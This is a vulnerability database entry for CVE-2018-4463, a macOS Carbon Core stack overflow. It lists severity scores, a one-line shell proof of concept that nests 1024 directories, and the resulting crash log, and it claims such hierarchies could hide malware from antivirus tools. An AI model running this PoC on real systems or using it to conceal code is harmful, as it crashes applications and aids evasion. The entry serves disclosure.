Lucene search

Zdt1337DAY-ID-31747

HistoryDec 06, 2018 - 12:00 a.m.

macOS 10.14.1 Carbon Core Memory corruption Vulnerability

2018-12-0600:00:00

0day.today

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

25.6%

JSON

CVE: CVE-2018-4463

Old and funny bug (CVE-2018-4463) was patched by Apple in last macOS security update. Since 2015 Apple was exposing the users using Apple’s filesystem for stack overflow and infection by hidedd malware in DMG image. Insufficient patch for old vulnerability is the cause of problems

Trivial and funny PoC:

# for i in {1..1024}; do mkdir B && cd B; done
 
And for macOS 10.13 you will get ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Crashed Thread:        0  Dispatch queue: com.apple.main-thread

Exception Type:        EXC_CRASH (SIGABRT)
Exception Codes:       0x0000000000000000, 0x0000000000000000
Exception Note:        EXC_CORPSE_NOTIFY

Application Specific Information:
[14239] stack overflow

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib            0x00007fff6baa8b66 __pthread_kill + 10
1   libsystem_pthread.dylib           0x00007fff6bc73080 pthread_kill + 333
2   libsystem_c.dylib                 0x00007fff6ba0424d __abort + 144
3   libsystem_c.dylib                 0x00007fff6ba04af8 __stack_chk_fail + 205
4   com.apple.CoreServices.CarbonCore    0x00007fff44ce6a66 canonpath(char const*, char*, int*) + 971
5   com.apple.CoreServices.CarbonCore    0x00007fff44ca50c6 FSGetCanonicalPath + 143
6   com.apple.CoreServices.CarbonCore    0x00007fff44ce6f88 PathGetObjectInfo(char const*, unsigned int, short*, unsigned int*, unsigned int*, char*, unsigned int*, unsigned char*, unsigned int*) + 135
7   com.apple.CoreServices.CarbonCore    0x00007fff44cf2fed FSPathMakeRefInternal(unsigned char const*, unsigned int, FSRef*, unsigned char*) + 99
8   com.apple.CoreFoundation          0x00007fff43b36444 _CFGetFSRefFromURL + 276
9   com.apple.AppKit                  0x00007fff412c2194 -[NSThemeDocumentButton _refreshDocumentIconAndDisplayNameForURL:] + 74
...
30  com.apple.AppKit                  0x00007fff4107aa72 NSApplicationMain + 804
31  libdyld.dylib                     0x00007fff6b958015 start + 1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
where stack smashing protection prevented the stack overflow but the terminal has crashed. Special crafted hierarchy making the malware possibility to hidde mailcous code in place where the most of antiviruses have no access. 

Credit:
Maksymilian Arciemowicz

References:
https://cxsecurity.com/issue/WLB-2015100149
https://support.apple.com/en-us/HT209341
https://cxsecurity.com/

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

25.6%

JSON

Related for 1337DAY-ID-31747